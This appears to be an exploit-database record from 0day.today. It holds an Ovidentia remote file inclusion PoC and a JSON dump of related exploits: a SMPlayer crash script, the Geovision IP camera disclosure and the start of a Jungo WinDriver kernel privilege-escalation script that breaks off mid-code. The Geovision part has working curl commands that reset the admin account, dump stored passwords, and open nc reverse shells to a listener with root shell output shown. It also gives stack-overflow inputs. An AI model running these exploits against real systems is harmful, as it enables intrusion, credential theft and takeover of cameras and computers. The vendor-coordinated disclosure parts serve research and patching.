ID 1337DAY-ID-25000 Type zdt Reporter bd0rk Modified 2016-04-12T00:00:00
Description
Exploit for php platform in category web applications
# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability
# Author: bd0rk || SCHOOL-OF-HACK.NET
# eMail: bd0rk[at]hackermail.com
# Website: http://www.school-of-hack.net
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838
Proof-of-Concept:
Vulnerable code in /troubletickets-7-6/programs/statistique_evolution.php, line 16:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]
The problem: the GLOBALS[babInstallPath] parameter is not declared before the require_once, so its value can be controlled by the request.
As a result an attacker can have the script include remote PHP code (a c99 or r57 web shell, for example) through it.
It's no problem to patch it!
Initialise this variable in the script before the include, or abort with an error when it is not already set.
Greetings from bd0rk. HackThePlanet!
# 0day.today [2018-03-19] #
{"published": "2016-04-12T00:00:00", "id": "1337DAY-ID-25000", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["description", "published", "reporter", "modified", "sourceHref", "sourceData", "title", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:51", "bulletin": {"published": "2016-02-25T00:00:00", "id": "1337DAY-ID-25000", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.6, "modified": "2016-04-19T04:09:51"}}, "hash": "2e383df99cd1c3b9c84f0fba2e099328e8f39e33ecbb646cfa526674ba2b7b53", "description": "A remote command execution vulnerability exists in Elastix PBX version 2.2.0 and earlier when using unpatched versions of FreePBX 2.5, 2.6, 2.7, 2.8, 2.9, and 2.10. This vulnerability in Elastix 2.2.0 and earlier allows for remote command execution in Elastix. Once it completes you may type \"nmap --interactive\" and \"!sh\" to escalate your privileges to root on most systems.\n\nThis is private exploit. You can buy it at http://0day.today", "type": "zdt", "lastseen": "2016-04-19T04:09:51", "edition": 1, "title": "Elastix PBX 2.2.0 Remote Command Execution with Local Privilege Escalation Exploit", "href": "http://0day.today/exploit/description/25000", "modified": "2016-02-25T00:00:00", "bulletinFamily": "exploit", "viewCount": 12, "cvelist": [], "sourceHref": "", "references": [], "reporter": "0day Today Team", "sourceData": "", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "sourceData"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "51fdf70b2265dec218616a77dd0e679a", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "fedb8f1af32e10bfd154845e1054c2ee", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "sourceHref"}, {"hash": "7bf59d5e58470604ab6f178f1d0a5c27", "key": "description"}, {"hash": 
"86fafcde2f8b00145efced7b975ee959", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a402e8dffe8ee0ba4a366d75dbe8fad6", "key": "published"}, {"hash": "a402e8dffe8ee0ba4a366d75dbe8fad6", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "91b82ecddd9fcdcfd18ba15ce1a4e812665629f336ba2427cf339162e795fe88", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2018-03-19T05:23:25"}, "dependencies": {"references": [{"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833"]}, {"type": "zdt", "idList": ["1337DAY-ID-29725", "1337DAY-ID-28439", "1337DAY-ID-25438", "1337DAY-ID-24947", "1337DAY-ID-24935", "1337DAY-ID-25723", "1337DAY-ID-20700", "1337DAY-ID-20597"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144046", "PACKETSTORM:137942", "PACKETSTORM:121045"]}, {"type": "exploitdb", "idList": ["EDB-ID:42624", "EDB-ID:40113", "EDB-ID:24935", "EDB-ID:24947"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/NOVELL_MDM_LFI", "MSF:EXPLOIT/LINUX/UPNP/MINIUPNPD_SOAP_BOF", "MSF:EXPLOIT/LINUX/MISC/MONGOD_NATIVE_HELPER"]}], "modified": "2018-03-19T05:23:25"}, "vulnersScore": -0.3}, "type": "zdt", "lastseen": "2018-03-19T05:23:25", "edition": 2, "title": "Ovidentia troubleticketsModule 7.6 - Remote File Inclusion", "href": "https://0day.today/exploit/description/25000", "modified": "2016-04-12T00:00:00", "bulletinFamily": "exploit", "viewCount": 19, "cvelist": [], "sourceHref": "https://0day.today/exploit/25000", "references": [], "reporter": "bd0rk", "sourceData": "# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability\r\n# Author: bd0rk || SCHOOL-OF-HACK.NET\r\n# eMail: bd0rk[at]hackermail.com\r\n# Website: http://www.school-of-hack.net\r\n# Download: 
http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838\r\n \r\nProof-of-Concept:\r\n \r\nVuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\nrequire_once $GLOBALS['babInstallPath'].'utilit/dateTime.php';\r\n \r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\n[+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE]\r\n \r\nThe problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once.\r\n So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it.\r\n It's no problem to patch it!\r\n Declare this parameter or use an alert!\r\n \r\n \r\nGreetings from bd0rk. HackThePlanet!\n\n# 0day.today [2018-03-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "5aa9637956cdcdfebff7b414e2d49d94", "key": "href"}, {"hash": "9aa94e028f9943096f22029df1d1332e", "key": "modified"}, {"hash": "9aa94e028f9943096f22029df1d1332e", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "30894eb60ec9170479037f799f3e38ce", "key": "reporter"}, {"hash": "997a60b608c0714ed79c69134df53273", "key": "sourceData"}, {"hash": "27ceadde9f7d51bd3c80e3a09c18ed35", "key": "sourceHref"}, {"hash": "30f79b5d6cdf0eb8ee49bce54a1b51c5", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-12-04T14:21:37", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-11-24T00:00:00", "published": "2019-11-24T00:00:00", "id": "1337DAY-ID-33585", "href": "https://0day.today/exploit/description/33585", "title": "SMPlayer 19.5.0 - Denial of Service Exploit", "type": "zdt", "sourceData": "# Title : SMPlayer 19.5.0 - Denial of Service (PoC)\r\n# Tested on : Windows 7 (64 bit)\r\n# Vulnerable Software: SMPlayer v 19.5.0\r\n# Exploit Author: Malav Vyas\r\n# Vendor Homepage: https://smplayer.info\r\n# Version : 19.5.0\r\n# Software Link : https://smplayer.info/en/downloads\r\n\r\n# POC\r\n# run this python file, which will generate attack.m3u file\r\n# .m3u file is used as a playlist\r\n# this python file will generate a .m3u file with 25000 \"A\" characters.\r\n# Open this file in SMPlayer two times.\r\n# second time, buffer would be successfully overflowed and it would result in a Denial Of Service attack.\r\n# For more details, please refer to video\r\n\r\nf=\"attack.m3u\"\r\n\r\nbof = \"A\"*25000\r\n\r\nwriteFile = open(f, \"w\")\r\nwriteFile.write(bof)\r\nwriteFile.close()\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33585"}, {"lastseen": "2018-03-19T21:12:59", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2018-02-07T00:00:00", "published": "2018-02-07T00:00:00", "href": "https://0day.today/exploit/description/29725", "id": "1337DAY-ID-29725", "title": "Geovision Inc. IP Camera/Video/Access Control - Multiple Remote Command Execution / Stack Overflow /", "type": "zdt", "sourceData": "[STX]\r\n \r\nSubject: Geovision Inc. 
IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access\r\n \r\nAttack vector: Remote\r\nAuthentication: Anonymous (no credentials needed)\r\nResearcher: bashis <mcw noemail eu> (November 2017)\r\nPoC: https://github.com/mcw0/PoC\r\nPython PoC: https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py\r\nRelease date: February 1, 2018\r\nFull Disclosure: 90 days\r\n \r\nVendor URL: http://www.geovision.com.tw/\r\nUpdated FW: http://www.geovision.com.tw/download/product/\r\n \r\nheap: Executable + Non-ASLR\r\nstack: Executable + ASLR\r\n \r\nVulnerable:\r\nPractically more or less all models and versions with FW before November/December 2017 of Geovision embedded IP devices suffer from one or more of these vulnerabilities.\r\n \r\nVerified:\r\nGV-BX1500 v3.10 2016-12-02\r\nGV-MFD1501 v3.12 2017-06-19\r\n \r\nTimeline:\r\nNovember 5, 2017: Initiated contact with Geovision\r\nNovember 6, 2017: Response from Geovision\r\nNovember 8, 2017: Informed Geovision about quite dangerous bug in 'FilterSetting.cgi'\r\nNovember 8, 2017: Responce from Geovision\r\nNovember 15, 2017: Reached out to Geovision to offer more time until FD\r\n (due to the easy exploiting and number of vulnerabilities in large number of products)\r\nNovember 17, 2017: Request from Geovision to have time to end of January 2018\r\nNovember 18, 2017: Agreed to FD date of February 1, 2018\r\nNovember 20, 2017: Received one image for test purposes\r\nNovember 26, 2017: ACK to Geovision that image looks good\r\nJanuary 16, 2018: Sent this FD and PoC Python to Geovision for comments before FD, if any objections.\r\nJanuary 17, 2018: Received all OK from Geovision, no objections, toghether with thanks for the effort for trying to make Geovision products more safe.\r\nJanuary 17, 2018: Thanked Geoviosion for good cooperation.\r\nFebruary 1, 2018: Full disclosure\r\n \r\n \r\n-[Unathorized Access]-\r\n \r\n1)\r\nPoC: Reset and change 'admin' to 
'root' with passwd 'PWN' (GV-MFD1501 v3.12 2017-06-19)\r\ncurl -v http://192.168.57.20:80/UserCreat.cgi?admin_username=root\\&admin_passwordNew=PWN\r\n \r\n2)\r\nPoC: Change device WebGUI language back to default\r\ncurl -v -X POST http://192.168.57.20:80/LangSetting.cgi -d lang_type=0\\&submit=Apply\r\n \r\n3)\r\nUnathorized upgrade of firmware.\r\nPoC: Reboot the remote device as in 'run_upgrade_prepare'\r\ncurl -v \"http://192.168.57.20:80/geo-cgi/sdk_fw_update.cgi\"\r\nURI: http://192.168.57.20/ssi.cgi/FirmwareUpdate.htm\r\n \r\n4)\r\nPoC: Upload of Firmware header for checking correct firmware.\r\ncurl -v -X PUT \"http://192.168.57.20:80/geo-cgi/sdk_fw_check.cgi\" -d \"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\"\r\n \r\n/var/log/messages\r\n192.168.57.1 - - [01/Jan/1970:00:32:43 +0000] \"PUT /geo-cgi/sdk_fw_check.cgi HTTP/1.1\" 200 25000 \"\" \"curl/7.38.0\"\r\nNov 5 17:11:51 thttpd[1576]: (1576) cgi[3734]: Spawned CGI process 1802 to run 'geo-cgi/sdk_fw_check.cgi', query[]\r\nNov 5 17:11:51 sdk_fw_check.cgi: CONTENT_LENGTH = 684\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[183]: base64 encode length : 684\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[184]: base64 encode output : BAAAALAAAAABAgAAAAAAADKvfBIAAAABGDIpBwAAAABhc19jcmZpZAAAAAAAAAAALgYAALAAAADXe///AAAAAAAAAABib290bG9hZGVyLmJpbgAAAAA0ALAAAgBOAP//AAAAAAAAAAB1SW1hZ2UAAAAAAAAAAAAA1OIaALAANgDSw///AAAAAAAAAAByYW1kaXNrLmd6AAAAAAAAALBtArAAUgAIuf//AAAAAAAAAAAjIFN0YXJpbmcgd2l0aCAnSElEOicgYW5kIHNwbGl0IGJ5ICcsJyBhbmQgZW5kIHdpdGggJ1xyXG4nICgweDBkIDB4MGEpDQpISUQ6MTE3MCxOYW1lOkdWLUxQQzIyMTAsRG93blZlcjoxMDINCkhJRDoxMTUwLE5hbWU6R1YtUFBUWjczMDBfU0QsRG93blZlcjozMDUNCkhJRDoxMTUyLE5hbWU6R1YtUFBUWjczMDBfRkUsRG93blZlcjoz\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[185]: decode length : 512\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) main[186]: decode output : ^D\r\nNov 5 17:11:51 sdk_fw_check.cgi: (1802) check_image_format_is_OK[839]: (1) Product Error: Image's magic[513] != DEV_MAGIC[1000]\r\nNov 5 
17:11:51 sdk_fw_check.cgi: (1802) check_firmware[135]: ERROR : check firmware, length [512]\r\n \r\n5)\r\nUnathorized access of 'sdk_config_set.cgi' to Import Setting (SDK_CONFIG_SET) \r\ncurl -v -X PUT \"http://192.168.57.20:80/geo-cgi/sdk_config_set.cgi\"\r\n \r\n6)\r\n/PSIA/\r\nAccess to GET (read) and PUT (write)\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/updateFirmware\r\ncurl -v -X PUT http://192.168.57.20:80/PSIA/System/factoryReset\r\n[...]\r\nList: /PSIA/System/reboot/index\r\nUsage: /PSIA/System/reboot/description\r\nPoC: curl -v -X PUT http://192.168.57.20:80/PSIA/System/reboot\r\nFull recursive list: /PSIA/indexr\r\n \r\n \r\n-[Remote Command Execution]-\r\n \r\n7)\r\nPoC will create 'tmp/Login.cgi' with '<!--#include file=\"SYS_CFG\"-->', then Dump All Settings,\r\nincluding login and passwords in clear text by accessing the created Login.htm\r\n \r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION&password=%3becho%20%22%3c%21--%23include%20file=%22SYS_CFG%22--%3e%22%3etmp/Login.htm%3b&data_type=1&attachment=1&channel=1&secret=1&key=PWNED\" ; curl -v \"http://192.168.57.20:80/ssi.cgi/tmp/Login.htm\"\r\n \r\n< HTTP/1.1 200 OK\r\n...\r\n-------------------------------------\r\n- -\r\n- Dump All Settings -\r\n- -\r\n-------------------------------------\r\n...\r\n \r\n \r\n8)\r\nPoC will pop reverse connect back shell to 192.168.57.1\r\n \r\n/www/PictureCatch.cgi\r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=GEOVISION\\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\\&data_type=1\\&attachment=1\\&channel=1\\&secret=1\\&key=PWNED\"\r\n \r\n$ ncat -vlp 1337\r\nNcat: Version 7.12 ( https://nmap.org/ncat )\r\nNcat: Listening on :::1337\r\nNcat: Listening on 0.0.0.0:1337\r\nNcat: Connection from 192.168.57.20.\r\nNcat: Connection from 
192.168.57.20:55331.\r\npwd\r\n/www\r\nid\r\nuid=0(root) gid=0(root)\r\nexit\r\n$\r\n \r\n9)\r\n/www/JpegStream.cgi\r\ncurl -v \"http://192.168.57.20:80/JpegStream.cgi?username=GEOVISION\\&password=%3bmkfifo%20/tmp/s0%3bnc%20-w%205%20192.168.57.1%201337</tmp/s0|/bin/sh>/tmp/s0%202>/tmp/s0%3brm%20/tmp/s0%3b\\&data_type=1\\&attachment=1\\&channel=1\\&secret=1\\&key=PWNED\"\r\n \r\n$ ncat -vlp 1337\r\nNcat: Version 7.12 ( https://nmap.org/ncat )\r\nNcat: Listening on :::1337\r\nNcat: Listening on 0.0.0.0:1337\r\nNcat: Connection from 192.168.57.20.\r\nNcat: Connection from 192.168.57.20:55332.\r\npwd\r\n/www\r\nid\r\nuid=0(root) gid=0(root)\r\nexit\r\n$\r\n \r\nProblem(s):\r\nSIiUTIL_GetDecryptData calling popen() \"sh -c /var/www/testbf d PWNED ;mkfifo /tmp/s0;...\" without proper sanitation of user input\r\n \r\nNote: \r\nVulnerable tags: 'username', 'password' and 'key'\r\n \r\n \r\n-[Double free]-\r\n \r\n10)\r\ncurl -v http://192.168.57.20:80/PSIA/System/configurationData\r\n*** glibc detected *** psia.cgi: double free or corruption (out): 0x00077d10 ***\r\n \r\n-[Stack Overflow]-\r\n \r\n11)\r\n/usr/local/thttpd\r\ncurl -v \"http://192.168.57.20:80/htpasswd?password=`for((i=0;i<140;i++));do echo -en \"X\";done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII\"\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x49494948 in ?? ()\r\n(gdb) bt\r\n#0 0x49494948 in ?? ()\r\n#1 0x0003889c in ?? 
()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) i reg\r\nr0 0x0 0\r\nr1 0x369650 3577424\r\nr2 0x1 1\r\nr3 0x68 104\r\nr4 0x41414141 1094795585\r\nr5 0x42424242 1111638594\r\nr6 0x43434343 1128481603\r\nr7 0x44444444 1145324612\r\nr8 0x45454545 1162167621\r\nr9 0x46464646 1179010630\r\nr10 0x47474747 1195853639\r\nr11 0x48484848 1212696648\r\nr12 0x3680e8 3571944\r\nsp 0x7ee0fbc8 0x7ee0fbc8\r\nlr 0x3889c 231580\r\npc 0x49494948 0x49494948\r\ncpsr 0x20000030 536870960\r\n(gdb)\r\n \r\n12)\r\n/usr/local/thttpd\r\ncurl -v http://192.168.57.20:80/geo-cgi/param.cgi?skey=`for((i=0;i<44;i++)); do echo -en \"X\"; done`AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN\r\n \r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x49494948 in ?? ()\r\n(gdb) bt\r\n#0 0x49494948 in ?? ()\r\n#1 0x3e4c4d54 in ?? ()\r\nBacktrace stopped: previous frame identical to this frame (corrupt stack?)\r\n(gdb) i reg\r\nr0 0xffffffff 4294967295\r\nr1 0x7e963e8c 2123775628\r\nr2 0x0 0\r\nr3 0x242 578\r\nr4 0x41414141 1094795585\r\nr5 0x42424242 1111638594\r\nr6 0x43434343 1128481603\r\nr7 0x44444444 1145324612\r\nr8 0x45454545 1162167621\r\nr9 0x46464646 1179010630\r\nr10 0x47474747 1195853639\r\nr11 0x48484848 1212696648\r\nr12 0xa 10\r\nsp 0x7e983c48 0x7e983c48\r\nlr 0x3e4c4d54 1045187924\r\npc 0x49494948 0x49494948\r\ncpsr 0x60000030 1610612784\r\n(gdb)\r\n \r\n13)\r\n/www/PictureCatch.cgi\r\ncurl -v \"http://192.168.57.20:80/PictureCatch.cgi?username=`for((i=0;i<324;i++));do echo -en \"A\";done`BBBB&password=GEOVISION&data_type=1&attachment=1&channel=1&secret=1&key=PWNED\"\r\n \r\n[pid 2215] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---\r\n \r\n14)\r\n/www/Login3gpp.cgi\r\ncurl -v \"http://192.168.57.20:80/Login3gpp.cgi?username=`for((i=0;i<444;i++));do echo -en \"A\";done`BBBB&password=PWNED\"\r\n \r\n[pid 2161] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424243} ---\r\n 
\r\n15)\r\n/www/Login.cgi\r\ncurl -v \"http://192.168.57.20:80/Login.cgi?username=`for((i=0;i<477;i++));do echo -en \"A\";done`BBBB&password=PWNED\"\r\n \r\n[pid 2135] --- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---\r\n \r\nNote: username and password uses strcpy() and both are vulnerable.\r\nHowever, 'password' cannot be used remotely since 'thttpd' checking for this, and is vulnerable for stack overflow.\r\n \r\nHave a nice day\r\n/bashis\r\n \r\n[ETX]\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29725"}, {"lastseen": "2018-01-10T03:12:13", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "https://0day.today/exploit/description/28439", "id": "1337DAY-ID-28439", "type": "zdt", "title": "Jungo DriverWizard WinDriver - Kernel Pool Overflow Exploit", "sourceData": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability\r\n\r\nDownload: http://www.jungo.com/st/products/windriver/\r\nFile: WD1240.EXE\r\nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba\r\nDriver: windrvr1240.sys\r\nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad\r\nCVE: CVE-2017-14153\r\nAuthor: Steven Seeley (mr_me) of Source Incite\r\nAffected: <= v12.4.0\r\nThanks: b33f, ryujin and sickness\r\nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html\r\n\r\nSummary:\r\n========\r\n\r\nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. 
The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.\r\n\r\nTimeline:\r\n=========\r\n\r\n2017-08-22 \u2013 Verified and sent to Jungo via <a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"4c3f2d20293f0c\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"1e78776c6d6a5e\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"41322422343328353801\">[email protected]</a>/<a href=\"/cdn-cgi/l/email-protection\" class=\"__cf_email__\" data-cfemail=\"234a4d454c6349564d444c0d404c4e\">[email protected]</a>\r\n2017-08-25 \u2013 No response from Jungo and two bounced emails\r\n2017-08-26 \u2013 Attempted a follow up with the vendor via website chat\r\n2017-08-26 \u2013 No response via the website chat\r\n2017-09-03 \u2013 Recieved an email from a Jungo representative stating that they are \"looking into it\"\r\n2017-09-03 \u2013 Requested a timeframe for patch development and warned of possible 0day release\r\n2017-09-06 \u2013 No response from Jungo\r\n2017-09-06 \u2013 Public 0day release of advisory\r\n\r\nExample:\r\n========\r\n\r\nC:\\Users\\Guest\\Desktop>icacls poc.py\r\npoc.py NT AUTHORITY\\Authenticated Users:(I)(F)\r\nNT AUTHORITY\\SYSTEM:(I)(F)\r\nBUILTIN\\Administrators:(I)(F)\r\nBUILTIN\\Users:(I)(F)\r\nMandatory Label\\Low Mandatory Level:(I)(NW)\r\n\r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\ndebugee\\guest\r\n\r\nC:\\Users\\Guest\\Desktop>poc.py\r\n\r\n--[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\r\nSteven Seeley (mr_me) of Source Incite\r\n\r\n(+) spraying pool with mixed objects...\r\n(+) sprayed the pool!\r\n(+) making pool holes...\r\n(+) made the pool holes!\r\n(+) allocating 
shellcode...\r\n(+) allocated the shellcode!\r\n(+) triggering pool overflow...\r\n(+) allocating pool overflow input buffer\r\n(+) elevating privileges!\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\Guest\\Desktop>\r\n\"\"\"\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport struct, sys, os, time\r\nfrom platform import release, architecture\r\n\r\nntdll = windll.ntdll\r\nkernel32 = windll.kernel32\r\nMEM_COMMIT = 0x00001000\r\nMEM_RESERVE = 0x00002000\r\nPAGE_EXECUTE_READWRITE = 0x00000040\r\nSTATUS_SUCCESS = 0x0\r\nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004\r\nSTATUS_INVALID_HANDLE = 0xC0000008\r\nSystemExtendedHandleInformation = 64\r\n\r\nclass LSA_UNICODE_STRING(Structure):\r\n\"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Length\", USHORT),\r\n(\"MaximumLength\", USHORT),\r\n(\"Buffer\", LPWSTR),\r\n]\r\n\r\nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):\r\n\"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Object\", c_void_p),\r\n(\"UniqueProcessId\", ULONG),\r\n(\"HandleValue\", ULONG),\r\n(\"GrantedAccess\", ULONG),\r\n(\"CreatorBackTraceIndex\", USHORT),\r\n(\"ObjectTypeIndex\", USHORT),\r\n(\"HandleAttributes\", ULONG),\r\n(\"Reserved\", ULONG),\r\n]\r\n\r\nclass SYSTEM_HANDLE_INFORMATION_EX(Structure):\r\n\"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"NumberOfHandles\", ULONG),\r\n(\"Reserved\", ULONG),\r\n(\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),\r\n]\r\n\r\nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure):\r\n\"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\"\r\n_fields_ = [\r\n(\"Name\", LSA_UNICODE_STRING),\r\n(\"Reserved\", ULONG * 22),\r\n]\r\n\r\nclass PROCESSENTRY32(Structure):\r\n_fields_ = [\r\n(\"dwSize\", c_ulong),\r\n(\"cntUsage\", 
c_ulong),\r\n(\"th32ProcessID\", c_ulong),\r\n(\"th32DefaultHeapID\", c_int),\r\n(\"th32ModuleID\", c_ulong),\r\n(\"cntThreads\", c_ulong),\r\n(\"th32ParentProcessID\", c_ulong),\r\n(\"pcPriClassBase\", c_long),\r\n(\"dwFlags\", c_ulong),\r\n(\"szExeFile\", c_wchar * MAX_PATH)\r\n]\r\n\r\nProcess32First = kernel32.Process32FirstW\r\nProcess32Next = kernel32.Process32NextW\r\n\r\ndef signed_to_unsigned(signed):\r\n\"\"\"\r\nConvert signed to unsigned integer.\r\n\"\"\"\r\nunsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed))\r\nreturn unsigned\r\n\r\ndef get_type_info(handle):\r\n\"\"\"\r\nGet the handle type information to find our sprayed objects.\r\n\"\"\"\r\npublic_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()\r\nsize = DWORD(sizeof(public_object_type_information))\r\nwhile True:\r\nresult = signed_to_unsigned(\r\nntdll.NtQueryObject(\r\nhandle, 2, byref(public_object_type_information), size, None))\r\nif result == STATUS_SUCCESS:\r\nreturn public_object_type_information.Name.Buffer\r\nelif result == STATUS_INFO_LENGTH_MISMATCH:\r\nsize = DWORD(size.value * 4)\r\nresize(public_object_type_information, size.value)\r\nelif result == STATUS_INVALID_HANDLE:\r\nreturn None\r\nelse:\r\nraise x_file_handles(\"NtQueryObject.2\", hex (result))\r\n\r\ndef get_handles():\r\n\"\"\"\r\nReturn all the processes handles in the system at the time.\r\nCan be done from LI (Low Integrity) level on Windows 7 x86.\r\n\"\"\"\r\nsystem_handle_information = SYSTEM_HANDLE_INFORMATION_EX()\r\nsize = DWORD (sizeof (system_handle_information))\r\nwhile True:\r\nresult = ntdll.NtQuerySystemInformation(\r\nSystemExtendedHandleInformation,\r\nbyref(system_handle_information),\r\nsize,\r\nbyref(size)\r\n)\r\nresult = signed_to_unsigned(result)\r\nif result == STATUS_SUCCESS:\r\nbreak\r\nelif result == STATUS_INFO_LENGTH_MISMATCH:\r\nsize = DWORD(size.value * 4)\r\nresize(system_handle_information, size.value)\r\nelse:\r\nraise x_file_handles(\"NtQuerySystemInformation\", 
